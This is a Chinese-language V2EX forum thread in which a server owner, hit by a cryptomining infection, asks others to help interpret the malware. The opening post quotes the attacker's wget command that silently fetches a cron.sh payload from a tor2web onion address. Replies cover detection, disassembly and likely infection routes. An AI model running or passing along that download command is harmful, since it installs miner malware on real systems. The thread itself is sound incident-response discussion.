服务器被挖矿,麻烦帮我看看脚本

2019-07-15 15:03:20 +08:00
 wangking

wget -t1 -T180 -qU- -O- --no-check-certificate rapid7cpfqnwxodo.tor2web.io/cron.sh

能看懂中间是 base64 加密,开头和结尾是什么?

5925 次点击
所在节点    Linux
14 条回复
bumz
2019-07-15 15:18:50 +08:00
tor2web

隐藏的还挺好
AllenBigBear
2019-07-15 15:30:00 +08:00
萌新请教,怎么发现服务器被挖矿的哈?
15651980765
2019-07-15 15:32:08 +08:00
@AllenBigBear = =服务商会发短信告诉你你的服务器 CPU 运行异常,长时间冲高。
wangking
2019-07-15 15:42:16 +08:00
@AllenBigBear 我们是监控报的,上来看,发现有异常进程
wangking
2019-07-15 15:49:46 +08:00
@bumz 这个开头和结尾是什么鬼,大佬了解吗
AllenBigBear
2019-07-15 15:59:27 +08:00
@15651980765 哦哦,好的,谢谢!
shinodajmk
2019-07-15 16:01:34 +08:00
服务器挖矿,这收益率是很低的。CPU 扛矿。除非你是 GPU 型机子,很棒帮
dlsflh
2019-07-15 16:19:46 +08:00
@shinodajmk 你要不去看一下 XMR ?
defunct9
2019-07-15 17:24:08 +08:00
s.bsst
6!8-
#C@>
cp -pf /H
tmp/.00 CE
/lib/sys!emd !
-log!in6r
; toucpxhd
defunct9
2019-07-15 17:24:54 +08:00
这是个前置的,一旦运行估计就开始下东西。安装,运行
wangking
2019-07-15 17:45:50 +08:00
@defunct9 找了个编辑器,打开就是这一堆的东西,看不懂。,
moonfly
2019-07-15 19:47:46 +08:00
二进制程序要反汇编,拖到 IDA 里看看,没加密混淆的话,应该能看出大致的程序运行逻辑,如果确定是挖矿木马,那就没啥分析的价值了!顶多学学它的自启动脚本怎么写的!

话说服务器被挖矿,第一件事情不是应该查是如何被挂的马吗?
nnnToTnnn
2019-07-16 08:56:20 +08:00
@moonfly 可能是破解的 xshell,或者是在非官网下载又不验证 hash 值
wangking
2019-07-16 10:13:03 +08:00
@moonfly 可能是历史遗留原因。

这是一个专为移动设备优化的页面(即为了让你能够在 Google 搜索结果里秒开这个页面),如果你希望参与 V2EX 社区的讨论,你可以继续到 V2EX 上打开本讨论主题的完整版本。

https://www.v2ex.com/t/583093

V2EX 是创意工作者们的社区,是一个分享自己正在做的有趣事物、交流想法,可以遇见新朋友甚至新机会的地方。

V2EX is a community of developers, designers and creative people.

© 2021 V2EX